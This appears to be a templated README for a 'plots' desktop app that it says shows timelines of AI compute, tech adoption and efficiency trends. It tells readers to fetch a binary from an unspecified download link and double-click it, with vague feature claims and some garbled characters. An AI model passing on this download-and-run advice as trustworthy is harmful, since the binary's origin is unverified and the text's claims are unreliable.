Welcome to the plots repository! This application helps you explore interactive timelines about AI compute scaling, tech adoption, and biological efficiency. You can see how these trends develop from 1900 to 2026 and beyond.
To start using the application, visit this page to download it: Download plots
- Operating System: Windows 10 or later, macOS Mojave or later, Linux (most distributions).
- RAM: At least 4GB recommended.
- Disk Space: A minimum of 200MB free space is necessary.
- Interactive Timelines: Navigate through key events in AI and technology history.
- Data Visualization: Understand complex data with visual aids.
- User-Friendly Interface: Designed for everyone, no programming knowledge required.
Once you have downloaded the application, follow these steps to run it:
- Locate the downloaded file in your computer's Downloads folder.
- Double-click the file to open it.
- A window will appear, displaying the interactive timelines.
- Use the navigation tools to explore different data sets.
You can customize your experience by:
- Adjusting the timeline scale to view different periods.
- Selecting specific data segments for in-depth analysis.
- Applying various visualization styles to suit your preference.
Explore how AI and technology have progressed through the years. The application illustrates key trends:
- AI Compute Scaling (1900β2026): Observe improvements in AI performance over time.
- Tech Adoption Acceleration (1957β2030+): See how rapidly new technologies gain acceptance.
- Energetic/Biological Efficiency Parallels: Discover similarities in growth patterns across different fields.
It provides visual insights into the growth trends of AI and technology, helping users understand complex data easily.
Yes, you can take screenshots or share them directly from the application to help others understand the data.
No prior knowledge is needed. The application is designed for users of all skill levels.
For more detailed information, tips, and updates, please visit our Documentation.
We welcome feedback and contributions! If you have ideas for improvement or if you encounter any issues, please raise them in the repository.
If you enjoyed using this application, consider sharing it with friends or colleagues who might find it useful.
To download the application again, or if you need to check for updates, visit this page: Download plots